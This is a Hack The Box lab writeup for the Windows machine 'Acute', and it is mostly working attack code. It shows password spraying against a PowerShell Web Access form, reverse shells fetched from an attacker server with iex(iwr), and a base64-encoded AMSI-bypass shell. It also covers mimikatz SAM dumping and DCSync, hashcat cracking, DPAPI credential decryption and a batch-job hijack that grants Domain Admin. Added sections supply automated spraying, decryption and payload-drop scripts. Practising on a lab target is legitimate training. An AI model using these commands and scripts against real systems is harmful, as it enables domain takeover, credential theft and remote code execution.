HTB Writeup: Acute

Hopping between jails, pivoting our way…

Enumeration

nmap

Starting Nmap 7.92 ( https://nmap.org ) at 2022-07-04 07:55 IST
Nmap scan report for 10.129.136.40 (10.129.136.40)
Host is up (0.080s latency).
Not shown: 65534 filtered tcp ports (no-response)
PORT    STATE SERVICE  VERSION
443/tcp open  ssl/http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
| ssl-cert: Subject: commonName=atsserver.acute.local
| Subject Alternative Name: DNS:atsserver.acute.local, DNS:atsserver
| Not valid before: 2022-01-06T06:34:58
|_Not valid after:  2030-01-04T06:34:58
|_http-server-header: Microsoft-HTTPAPI/2.0
|_ssl-date: 2022-07-04T02:43:16+00:00; +15m23s from scanner time.
| tls-alpn:
|_  http/1.1
|_http-title: Not Found
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows

Host script results:
|_clock-skew: 15m22s

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 133.00 seconds
  1. A web server at TCP/443 is detected.
  2. On browsing through the website, a document is found at https://atsserver.acute.local/New_Starter_CheckList_v7.docx (on About Page)

Document

  1. The document is an Induction Checklist for New Starters: a standard schedule of activities to follow while onboarding new employees.


  2. Under the details for the activity IT Overview, it is mentioned that some users don’t change the default password Password1!.

  3. The document also points to a remote training link: https://atsserver.acute.local/Acute_Staff_Access

  4. The link redirects to a Windows PowerShell Web Access Console.


  5. The metadata of document shows the origin computer : Acute-PC01


Initial Access

  1. PSWA needs three values to open a PowerShell session on a computer in the network: a username, a password and a target computer name (or connection URI).

  2. The password (Password1!) comes from the document and the computer name (Acute-PC01) from its metadata. Only a valid username is unknown.

  3. The author field of the document shows the company's username convention: the first letter of the first name followed by the last name (<F><LastName>).

  4. A list of employees is available on the About page on the website.


  5. A list of usernames is created using this information:

    Aileen Wallace
    Charlotte Hall
    Evan Davies
    Ieuan Monks
    Joshua Morgan
    Lois Hopkins
    AWallace
    CHall
    EDavies
    IMonks
    JMorgan
    LHopkins
    Aileen
    Charlotte
    Evan
    Ieuan
    Joshua
    Lois
    
  6. After spraying Password1! against Acute\<Username> for every candidate in the list (target computer Acute-PC01, through the PSWA logon form), one valid set of credentials is found: Acute\EDavies:Password1!
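The username derivation in steps 3 to 6, as an added PowerShell example that is not part of the original writeup: it builds the candidate list from the six names on the About page under the observed <F><LastName> convention and a few other conventions companies commonly use. Those extra conventions, the 20-character sAMAccountName limit check and the users.txt file name are this example's own choices, not anything the writeup states.

```powershell
# Added example (not from the original writeup): derive candidate usernames
# from the employee names on the About page so that one password (Password1!)
# can be sprayed against each of them.

$employees = @(
    'Aileen Wallace', 'Charlotte Hall', 'Evan Davies',
    'Ieuan Monks', 'Joshua Morgan', 'Lois Hopkins'
)

function Get-CandidateUsernames {
    param(
        [Parameter(Mandatory)] [string[]] $FullNames,
        [string] $Domain = 'Acute'
    )
    $candidates = foreach ($name in $FullNames) {
        $parts = $name.Trim() -split '\s+'
        if ($parts.Count -lt 2) { continue }
        $first   = $parts[0]
        $last    = $parts[-1]
        $initial = $first.Substring(0, 1)

        # Convention observed in the document metadata: <F><LastName>
        "$initial$last"

        # Assumed extra conventions, worth a try if the first one yields nothing
        $first
        "$first.$last"
        "$first$last"
        "$initial.$last"
        "$first$($last.Substring(0, 1))"
    }
    # sAMAccountName is limited to 20 characters; dedupe case-insensitively
    $candidates |
        ForEach-Object { $_.ToLower() } |
        Where-Object  { $_.Length -le 20 } |
        Sort-Object -Unique |
        ForEach-Object { "$Domain\$_" }
}

Get-CandidateUsernames -FullNames $employees | Set-Content -Path .\users.txt
Get-Content .\users.txt
```

The output is one DOMAIN\user per line, ready to feed into whatever does the spraying against the PSWA form; the first convention in the list is the one that produced Acute\edavies on this box.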


User Access

  1. With the privileges of EDavies, a winPEAS enumeration is performed.

  2. A user-writable path that is listed under the AV exclusions is found: C:\Utils. Anything dropped there will not be scanned, which matters for the tooling used later.


  3. Querying the active sessions with query user from the PSWA session shows that the user edavies also has an active console (interactive) session. What that user is doing on screen can be captured from a meterpreter session (for example with the screenshot or screenshare commands).


  4. From that capture, Acute\EDavies is seen using the credentials of Acute\IMonks to execute commands on ATSSERVER, the Domain Controller for the domain ACUTE.LOCAL, through the session configuration dc_manage (the same one mentioned in the Word document). The credentials are Acute\IMonks:W3_4R3_th3_f0rce. (the trailing period is part of the password).

  5. Command execution with these credentials and the dc_manage configuration:

    $username = "Acute\imonks"
    $password = ConvertTo-SecureString -AsPlainText -Force "W3_4R3_th3_f0rce."
    $cred = New-Object System.Management.Automation.PSCredential($username, $password)

    Invoke-Command -ComputerName ATSSERVER -ConfigurationName dc_manage -Credential $cred -ScriptBlock {whoami}

  6. This does not work from inside the PSWA console: that console is already a remote PowerShell session, so a further Invoke-Command from it is a second hop and fails. The workaround is to first get a raw reverse PowerShell shell on Acute-PC01 with Nishang's Invoke-PowerShellTcp.ps1 (hosted on the attacker's web server) and run the Invoke-Command from there.

    iex(iwr http://my.ip.addr.ess/Invoke-PowerShellTcp.ps1 -UseBasicParsing); Invoke-PowerShellTcp -Reverse -IPAddress my.ip.addr.ess -Port <ListenerPort>
    


  7. The remote session configuration dc_manage is limited in capabilities: it is a constrained endpoint that exposes only a handful of cmdlets, analogous to a shell jail.


Privilege Escalation

Escaping Powershell Jail

  1. The PowerShell jail exposes the following commands to the user Acute\imonks:

    1. Get-Alias
    2. Get-ChildItem (ls for directories)
    3. Get-Command
    4. Get-Content (reads the content of a file)
    5. Get-Location
    6. Set-Content (writes a new file or overwrites an existing one)
    7. Set-Location
    8. Write-Output
  2. Apart from these, the basic aliases ls, cat and cd also work.

  3. Enumerating further, a PowerShell script wm.ps1 is found in the Desktop folder of imonks. Reading it through the jail ($cred is the imonks PSCredential built earlier):

    Invoke-Command -ComputerName ATSSERVER -ConfigurationName dc_manage -Credential $cred -ScriptBlock {cat C:\Users\imonks\Desktop\wm.ps1}

    # contents of wm.ps1
    $securepasswd = '01000000d08c9ddf0115d1118c7a00c04fc297eb0100000096ed5ae76bd0da4c825bdd9f24083e5c0000000002000000000003660000c00000001000000080f704e251793f5d4f903c7158c8213d0000000004800000a000000010000000ac2606ccfda6b4e0a9d56a20417d2f67280000009497141b794c6cb963d2460bd96ddcea35b25ff248a53af0924572cd3ee91a28dba01e062ef1c026140000000f66f5cec1b264411d8a263a2ca854bc6e453c51'
    $passwd = $securepasswd | ConvertTo-SecureString
    $creds = New-Object System.Management.Automation.PSCredential ("acute\jmorgan", $passwd)
    Invoke-Command -ScriptBlock {Get-Volume} -ComputerName Acute-PC01 -Credential $creds
    
  4. The script uses the credentials of Acute\jmorgan to run Get-Volume on Acute-PC01. Acute\jmorgan is a member of the local Administrators group on Acute-PC01.

  5. The script can be modified with the Set-Content command that is available to imonks.

  6. The password in the script is stored as a DPAPI-protected string (the output of ConvertFrom-SecureString). ConvertTo-SecureString turns it back into a SecureString, which is what a PSCredential object needs, so the plaintext never has to appear in the script.

  7. A StackOverflow answer describes how to convert such a SecureString back into the plaintext password. The catch is that DPAPI ties the blob to the user profile and machine it was created on, so it cannot be decrypted anywhere else (ConvertTo-SecureString fails with "Key not valid for use in specified state"). Since wm.ps1 is run as imonks on ATSSERVER, rewriting it to decrypt and print the password is enough. Setting the contents of wm.ps1 to the following yields the plaintext:

    $securepasswd = "01000000d08c9ddf0115d1118c7a00c04fc297eb0100000096ed5ae76bd0da4c825bdd9f24083e5c0000000002000000000003660000c00000001000000080f704e251793f5d4f903c7158c8213d0000000004800000a000000010000000ac2606ccfda6b4e0a9d56a20417d2f67280000009497141b794c6cb963d2460bd96ddcea35b25ff248a53af0924572cd3ee91a28dba01e062ef1c026140000000f66f5cec1b264411d8a263a2ca854bc6e453c51" ; $passwd = $securepasswd | ConvertTo-SecureString ; $creds = New-Object System.Management.Automation.PSCredential ("acute\jmorgan", $passwd) ; $Ptr = [System.Runtime.InteropServices.Marshal]::SecureStringToCoTaskMemUnicode($passwd) ; $result = [System.Runtime.InteropServices.Marshal]::PtrToStringUni($Ptr); [System.Runtime.InteropServices.Marshal]::ZeroFreeCoTaskMemUnicode($Ptr) ; $result
    
  8. The password is recovered by running the following commands in order from the reverse shell on Acute-PC01 ($cred is the imonks PSCredential built in step 5 of the User Access section):

    Invoke-Command -ComputerName ATSSERVER -Credential $cred -ConfigurationName dc_manage -ScriptBlock{Set-Content C:\Users\imonks\Desktop\wm.ps1 '$securepasswd = "01000000d08c9ddf0115d1118c7a00c04fc297eb0100000096ed5ae76bd0da4c825bdd9f24083e5c0000000002000000000003660000c00000001000000080f704e251793f5d4f903c7158c8213d0000000004800000a000000010000000ac2606ccfda6b4e0a9d56a20417d2f67280000009497141b794c6cb963d2460bd96ddcea35b25ff248a53af0924572cd3ee91a28dba01e062ef1c026140000000f66f5cec1b264411d8a263a2ca854bc6e453c51" ; $passwd = $securepasswd | ConvertTo-SecureString ; $creds = New-Object System.Management.Automation.PSCredential ("acute\jmorgan", $passwd) ; $Ptr = [System.Runtime.InteropServices.Marshal]::SecureStringToCoTaskMemUnicode($passwd) ; $result = [System.Runtime.InteropServices.Marshal]::PtrToStringUni($Ptr); [System.Runtime.InteropServices.Marshal]::ZeroFreeCoTaskMemUnicode($Ptr) ; $result'}
       
    Invoke-Command -ComputerName ATSSERVER -Credential $cred -ConfigurationName dc_manage -ScriptBlock{C:\Users\imonks\Desktop\wm.ps1}
    # !T5_0nly_y4_{f4c3}
       
    
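The DPAPI round trip behind steps 6 to 8, as an added PowerShell example that is not part of the original writeup: it shows how a blob like the one in wm.ps1 is produced, why it only decrypts for the same user on the same Windows machine, and two ways of recovering the plaintext (the Marshal route the writeup uses and the shorter NetworkCredential route). The demo password and the account name acute\demo are made up for the example.

```powershell
# Added example (not from the original writeup): create, fail to decrypt
# elsewhere, and decrypt a DPAPI-protected SecureString like wm.ps1's.
# Windows PowerShell / Windows only: without -Key, ConvertFrom-SecureString
# uses DPAPI with the current user's master key.

function Protect-Password {
    param([Parameter(Mandatory)] [string] $Plaintext)
    # Output is a hex string starting 01000000d08c9ddf... (DPAPI blob header),
    # bound to this user + this machine, exactly like the value in wm.ps1.
    (ConvertTo-SecureString -AsPlainText -Force $Plaintext) | ConvertFrom-SecureString
}

function Unprotect-Password {
    param([Parameter(Mandatory)] [string] $Blob)
    try {
        # Fails for any other user or machine with
        # "Key not valid for use in specified state."
        $secure = $Blob | ConvertTo-SecureString
    } catch {
        throw "DPAPI blob is not decryptable in this context: $($_.Exception.Message)"
    }

    # Way 1 (what the writeup does): copy the SecureString to unmanaged memory,
    # read it back as a .NET string, then zero and free the buffer.
    $ptr = [System.Runtime.InteropServices.Marshal]::SecureStringToCoTaskMemUnicode($secure)
    try {
        $viaMarshal = [System.Runtime.InteropServices.Marshal]::PtrToStringUni($ptr)
    } finally {
        [System.Runtime.InteropServices.Marshal]::ZeroFreeCoTaskMemUnicode($ptr)
    }

    # Way 2 (no P/Invoke): NetworkCredential exposes the plaintext directly.
    $viaNetCred = [System.Net.NetworkCredential]::new('', $secure).Password

    if ($viaMarshal -ne $viaNetCred) { throw 'Decryption methods disagree' }
    $viaMarshal
}

# Round trip under the current user (demo password is made up)
$blob = Protect-Password -Plaintext 'Demo_P@ssw0rd!'
$blob
Unprotect-Password -Blob $blob

# A PSCredential built from the blob is usable without ever seeing the
# password, but anyone running as this user on this box gets it back anyway.
$cred = New-Object System.Management.Automation.PSCredential('acute\demo', ($blob | ConvertTo-SecureString))
$cred.GetNetworkCredential().Password
```

The last line is the shortest form of all: once a PSCredential exists in a session, GetNetworkCredential().Password hands over the plaintext, which is why "encrypted" credentials in scripts on a jump host are only as secret as the account that can run those scripts.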


  9. Credentials for Acute\jmorgan are obtained. Acute\jmorgan:!T5_0nly_y4_{f4c3}

  10. Commands can now be executed on Acute-PC01 with the same Invoke-Command pattern, using a PSCredential object for jmorgan and -ComputerName Acute-PC01:

    $username = "Acute\jmorgan"
    $password = ConvertTo-SecureString -AsPlainText -Force "!T5_0nly_y4_{f4c3}"
    $credential = New-Object System.Management.Automation.PSCredential($username, $password)
    Invoke-Command -ComputerName Acute-PC01 -Credential $credential -ScriptBlock {whoami}
    


  11. The user edavies can now be added to the local Administrators group on Acute-PC01, which elevates the existing edavies session and allows the SAM hashes to be dumped from the machine:

    net.exe localgroup Administrators Acute\edavies /add
    


  12. Apart from this, a full, unrestricted PowerShell session as imonks on ATSSERVER can be obtained, which is useful for Active Directory and basic host enumeration. This is done by setting the content of wm.ps1 to an encoded reverse-shell command (decoded form in the comment below; the AMSI bypass script is loaded first so that the Nishang shell is not blocked):

    powershell -ep bypass -enc aQBlAHgAKABpAHcAcgAgAGgAdAB0AHAAOgAvAC8AMQAwAC4AMQAwAC4AMQA0AC4AMgAxADoANwAwADcAMAAvAGEAbQBzAGkALQBiAHkAcABhAHMAcwAuAHAAcwAxACAALQB1AHMAZQBiAGEAcwBpAGMAcABhAHIAcwBpAG4AZwApADsAIABpAGUAeAAoAGkAdwByACAAaAB0AHQAcAA6AC8ALwAxADAALgAxADAALgAxADQALgAyADEAOgA3ADAANwAwAC8ASQBuAHYAbwBrAGUALQBQAG8AdwBlAHIAUwBoAGUAbABsAFQAYwBwAC4AcABzADEAIAAtAHUAcwBlAGIAYQBzAGkAYwBwAGEAcgBzAGkAbgBnACkAOwAgAEkAbgB2AG8AawBlAC0AUABvAHcAZQByAFMAaABlAGwAbABUAGMAcAAgAC0AUgBlAHYAZQByAHMAZQAgAC0ASQBQAEEAZABkAHIAZQBzAHMAIAAxADAALgAxADAALgAxADQALgAyADEAIAAtAFAAbwByAHQAIAA5ADAAOQAwAA==
        
    # iex(iwr http://my-web-server.local/amsi-bypass.ps1 -usebasicparsing); iex(iwr http://my-web-server.local/Invoke-PowerShellTcp.ps1 -usebasicparsing); Invoke-PowerShellTcp -Reverse -IPAddress local-machine -Port 9090
    
  13. The following commands spawn the unrestricted reverse PowerShell (start a listener on port 9090 first; $cred is the imonks PSCredential):

    $username = "Acute\imonks"
    $password = ConvertTo-SecureString -AsPlainText -Force "W3_4R3_th3_f0rce."
    $cred = New-Object System.Management.Automation.PSCredential($username, $password)

    Invoke-Command -ComputerName ATSSERVER -ConfigurationName dc_manage -Credential $cred -ScriptBlock {Set-Content C:\Users\imonks\Desktop\wm.ps1 'powershell -ep bypass -enc <base64 string from step 12>'}

    Invoke-Command -ComputerName ATSSERVER -ConfigurationName dc_manage -Credential $cred -ScriptBlock {C:\Users\imonks\Desktop\wm.ps1}
        
    


Dumping SAM Hashes and Password Spray

  1. After adding Acute\EDavies to the Administrators group, the session has to be relaunched for new privileges to take effect.

  2. After the relaunch, privileges can be checked by using whoami /priv command.


  3. Mimikatz can then be downloaded into the AV-excluded directory C:\Utils and run to dump the SAM hashes (token::elevate first, to obtain the SYSTEM token that lsadump::sam needs):

    .\mimikatz.exe "token::elevate" "lsadump::sam" "exit" | Out-File -FilePath .\SAMDump.txt -Encoding utf8
    


  4. The NTLM hash of the local Administrator was cracked with hashcat (-m 1000 is the NTLM mode):

    .\hashcat.exe -m 1000 -a 0 -O Y:\Documents\HTB\Acute\samhash.hash G:\Wordlists\rockyou.txt
       
    # a29f7623fd11550def0192de9246f46b:[email protected]
    
  5. This password can be sprayed against the remaining users on ATSSERVER:

    1. Acute\AWallace
    2. Acute\CHall
    3. Acute\LHopkins
  6. The password worked for the Acute\AWallace account:

    $username = "Acute\AWallace"
    $password = ConvertTo-SecureString -AsPlainText -Force "[email protected]"
    $credential = New-Object System.Management.Automation.PSCredential($username, $password)
       
    Invoke-Command -ComputerName ATSSERVER -Credential $credential -Configuration dc_manage -ScriptBlock {whoami}
       
    


Active Directory Enumeration and Looking Around on Domain Controller

  1. Going back to the unrestricted PowerShell session of imonks, it can be used for AD and host enumeration with BloodHound, winPEAS and PowerView.ps1.

  2. A quick BloodHound mapping shows that the domain group Site_Admin is a member of the Domain Admins group. SID: S-1-5-21-1786406921-1914792807-2072761762-2102

  3. The footer of the Word Document says the following:

    **Lois is the only authorized personnel to change Group Membership, Contact Lois to have this approved and changed if required. Only Lois can become site admin. **

  4. According to this, Acute\LHopkins should be able to change the membership of that group. This can be confirmed by checking the ACEs Acute\LHopkins holds on the Site_Admin object:

    # From PowerView.ps1
    # LHopkins SID : S-1-5-21-1786406921-1914792807-2072761762-1109
    # Site_Admin SID : S-1-5-21-1786406921-1914792807-2072761762-2102

    Get-DomainObjectAcl -ResolveGUIDs | Where-Object { $_.ObjectSID -eq "<Site_Admin SID>" -and $_.SecurityIdentifier -eq "<LHopkins SID>" }
    


  5. This confirms that Acute\LHopkins has a GenericAll ACE on the Site_Admin group object, which gives full control over it, including the right to add members.
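The same ACL check without PowerView, as an added PowerShell example that is not part of the original writeup: it reads the DACL of an AD object through plain .NET (System.DirectoryServices) and reports which ACEs a given principal holds on it, flagging the rights that are sufficient to add group members (GenericAll, GenericWrite, WriteDacl, WriteOwner, or WriteProperty on the member attribute). The group and principal names are the writeup's; the script assumes it runs from a domain-joined host or a session that can reach the DC over LDAP, which is what the imonks reverse shell on ATSSERVER provides. The schema GUID of the member attribute is the well-known bf9679c0-0de6-11d0-a285-00aa003049e2.

```powershell
# Added example (not from the original writeup): list the ACEs one principal
# holds on one AD object using System.DirectoryServices only.

$adr = [System.DirectoryServices.ActiveDirectoryRights]
$MemberAttributeGuid = [Guid]'bf9679c0-0de6-11d0-a285-00aa003049e2'   # schema GUID of 'member'

function Get-PrincipalRightsOnObject {
    param(
        [Parameter(Mandatory)] [string] $ObjectSamAccountName,    # e.g. Site_Admin
        [Parameter(Mandatory)] [string] $PrincipalSamAccountName  # e.g. lhopkins
    )
    # Resolve both objects in the default naming context
    $searcher = [ADSISearcher]"(sAMAccountName=$ObjectSamAccountName)"
    $target   = $searcher.FindOne()
    if (-not $target) { throw "Object '$ObjectSamAccountName' not found" }

    $searcher.Filter = "(sAMAccountName=$PrincipalSamAccountName)"
    $principal = $searcher.FindOne()
    if (-not $principal) { throw "Principal '$PrincipalSamAccountName' not found" }
    $principalSid = [System.Security.Principal.SecurityIdentifier]::new(
        [byte[]]$principal.Properties['objectsid'][0], 0)

    # Read the DACL (explicit + inherited ACEs) with identities as SIDs
    $entry = $target.GetDirectoryEntry()
    $rules = $entry.ObjectSecurity.GetAccessRules($true, $true, [System.Security.Principal.SecurityIdentifier])

    foreach ($ace in $rules) {
        if ($ace.IdentityReference.Value -ne $principalSid.Value) { continue }
        $rights = $ace.ActiveDirectoryRights

        # Rights that let the principal add members to a group
        $canAddMembers =
            $rights.HasFlag($adr::GenericAll)  -or
            $rights.HasFlag($adr::GenericWrite) -or
            $rights.HasFlag($adr::WriteDacl)    -or
            $rights.HasFlag($adr::WriteOwner)   -or
            ($rights.HasFlag($adr::WriteProperty) -and
             ($ace.ObjectType -eq [Guid]::Empty -or $ace.ObjectType -eq $MemberAttributeGuid))

        [pscustomobject]@{
            Object        = $target.Properties['distinguishedname'][0]
            Principal     = $PrincipalSamAccountName
            Type          = $ace.AccessControlType
            Rights        = $rights
            ObjectType    = $ace.ObjectType
            Inherited     = $ace.IsInherited
            CanAddMembers = ($ace.AccessControlType -eq 'Allow') -and $canAddMembers
        }
    }
}

Get-PrincipalRightsOnObject -ObjectSamAccountName 'Site_Admin' -PrincipalSamAccountName 'lhopkins' | Format-List
```

Reading the DACL needs no special privilege (authenticated users can read ntSecurityDescriptor by default), so the same function works from the constrained-but-escaped imonks session as well as from a defender's workstation when auditing who can change membership of groups nested under Domain Admins.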

  6. On further enumeration, an odd folder is found under C:\Program Files, named keepmeon ("Keep Me On"). The user Acute\imonks does not have permission to list the contents of C:\Program Files\keepmeon.


  7. But the user Acute\AWallace does have permission to do so:


  8. There is a single .bat file in the directory. Its contents:

    REM This is run every 5 minutes. For Lois use ONLY
    @echo off
     for /R %%x in (*.bat) do (
     if not "%%x" == "%~0" call "%%x"
    )
    
  9. The batch file calls every other .bat file in the same folder (skipping itself via %~0), and according to its own comment it runs every 5 minutes for Lois, i.e. as LHopkins, who holds GenericAll on Site_Admin. This is a perfect place to drop a .bat that adds one of the earlier compromised users to the Site_Admin group:

    net.exe group Site_admin "edavies" /add /domain # to attack from Acute-PC01
    net.exe group Site_admin "imonks" /add /domain # to attack from the Domain Controller

Exploitation

  1. The exploit is carried out with the following commands, as Acute\AWallace, who can write into the keepmeon folder:

    $username = "Acute\AWallace"
    $password = ConvertTo-SecureString -AsPlainText -Force "[email protected]"
    $credential = New-Object System.Management.Automation.PSCredential($username, $password)
       
    Invoke-Command -ComputerName ATSSERVER -Configuration dc_manage -Credential $credential -ScriptBlock {Set-Content "C:\Program Files\keepmeon\actual_update00.bat" 'net.exe group Site_admin "edavies" /add /domain'}
       
    Invoke-Command -ComputerName ATSSERVER -Configuration dc_manage -Credential $credential -ScriptBlock {Set-Content "C:\Program Files\keepmeon\actual_update01.bat" 'net.exe group Site_admin "imonks" /add /domain'}
       
    
  2. After placing the files, execution may happen immediately or within a few minutes, depending on when the job last ran; it runs every five minutes.

  3. On execution, the member(s) are added to the Site_Admin domain group.
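The drop-and-wait procedure of steps 1 to 3, as an added PowerShell example that is not part of the original writeup: it writes the payload .bat through the dc_manage jail as AWallace (Set-Content is one of the cmdlets the jail exposes, and the remote command is sent as a plain command line so it works in a constrained endpoint), polls the Site_Admin membership over LDAP until the 5-minute runner has picked the file up, and then blanks the dropped file. It assumes it runs from a host that reaches ATSSERVER over WinRM and LDAP, such as the shell on Acute-PC01; the AWallace password is the one recovered with hashcat above and is left as a placeholder; the poll interval, timeout and file name are this example's own choices.

```powershell
# Added example (not from the original writeup): drop the keepmeon payload,
# wait for the scheduled runner, then clean up the file.

$ComputerName = 'ATSSERVER'
$Config       = 'dc_manage'
$DropFile     = 'C:\Program Files\keepmeon\actual_update00.bat'
$TargetGroup  = 'Site_Admin'
$NewMember    = 'edavies'

$user = 'Acute\AWallace'
$pass = ConvertTo-SecureString -AsPlainText -Force '<AWallace password recovered with hashcat>'
$cred = New-Object System.Management.Automation.PSCredential($user, $pass)

function Test-GroupMember {
    param([Parameter(Mandatory)] [string] $Group, [Parameter(Mandatory)] [string] $SamAccountName)
    # Pure LDAP check, independent of what the constrained endpoint allows
    $grp = ([ADSISearcher]"(&(objectClass=group)(sAMAccountName=$Group))").FindOne()
    if (-not $grp) { throw "Group '$Group' not found" }
    $usr = ([ADSISearcher]"(sAMAccountName=$SamAccountName)").FindOne()
    if (-not $usr) { throw "User '$SamAccountName' not found" }
    $grp.Properties['member'] -contains $usr.Properties['distinguishedname'][0]
}

function Invoke-JailSetContent {
    param([Parameter(Mandatory)] [string] $Path, [Parameter(Mandatory)] [string] $Content)
    # Build the remote text as a single command invocation (no variables, no
    # param block) so it also runs in a NoLanguage / restricted endpoint.
    $remote = [scriptblock]::Create("Set-Content -Path '$Path' -Value '$Content'")
    Invoke-Command -ComputerName $ComputerName -ConfigurationName $Config -Credential $cred -ScriptBlock $remote
}

function Invoke-KeepMeOn {
    param([int] $PollSeconds = 30, [int] $TimeoutMinutes = 12)

    if (Test-GroupMember -Group $TargetGroup -SamAccountName $NewMember) {
        Write-Host "$NewMember is already in $TargetGroup"
        return $true
    }

    # 1. Drop the payload next to the runner script
    $payload = "net.exe group $TargetGroup `"$NewMember`" /add /domain"
    Invoke-JailSetContent -Path $DropFile -Content $payload

    # 2. Wait for the 5-minute job; give it two full cycles plus slack
    $added    = $false
    $deadline = (Get-Date).AddMinutes($TimeoutMinutes)
    while ((Get-Date) -lt $deadline) {
        if (Test-GroupMember -Group $TargetGroup -SamAccountName $NewMember) {
            Write-Host "$NewMember is now in $TargetGroup"
            $added = $true
            break
        }
        Start-Sleep -Seconds $PollSeconds
    }

    # 3. Clean up: Remove-Item is not exposed by the jail, so blank the file
    #    (an empty .bat does nothing when the runner calls it). The group
    #    change itself is left in place and must be reverted by hand.
    Invoke-JailSetContent -Path $DropFile -Content ''
    $added
}

Invoke-KeepMeOn
```

Polling over LDAP rather than re-reading the folder through the jail avoids a race with the runner and makes the result the same thing a defender would see: a new member on a group that is nested under Domain Admins, written by a scheduled batch job.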


  4. Members of Domain Admins (here, via Site_Admin) can now perform a DCSync attack using either mimikatz.exe or Invoke-Mimikatz.ps1:

    Invoke-Mimikatz -Command '"lsadump::dcsync /patch /all /domain:acute.local" "exit"' | Out-File -FilePath dcsync.txt
    


  5. To get a shell as NT AUTHORITY\SYSTEM on the domain controller, a scheduled task running as SYSTEM can be created and started remotely with the new domain admin rights (the task fetches the same AMSI bypass and Nishang reverse shell; the listener on port 9092 must be up first):

    schtasks /create /S atsserver.acute.local /SC Weekly /RU "NT Authority\SYSTEM" /TN "STCheck" /TR "powershell.exe -c 'iex (iwr http://dropzone.local/amsi-bypass.ps1 -usebasicparsing); iex (iwr http://dropzone.local/Invoke-PowerShellTcp.ps1 -usebasicparsing); Invoke-PowerShellTcp -Reverse -IpAddress 10.10.14.21 -Port 9092'"
    schtasks /Run /S atsserver.acute.local /TN "STCheck"
    


The remote domain is now completely compromised.

Mayank Malik
CRTP | Incident Responder | Synack Red Team Member | Threat Analyst | Security Researcher | Cloud/Network Architect

Mayank Malik is a tech-savvy person, Red Team enthusiast, and likes to wander around to learn new stuff. Cryptography, networking and system administration are his forte. He is one of the founding members of the CTF team Abs0lut3Pwn4g3 and a core member at DC 91120 (DEFCON Community Group). Apart from the mentioned skills, he has good communication skills and is a goal-oriented person. Yellow belt holder at pwn.college, in pursuit of learning and achieving the Blue Belt.
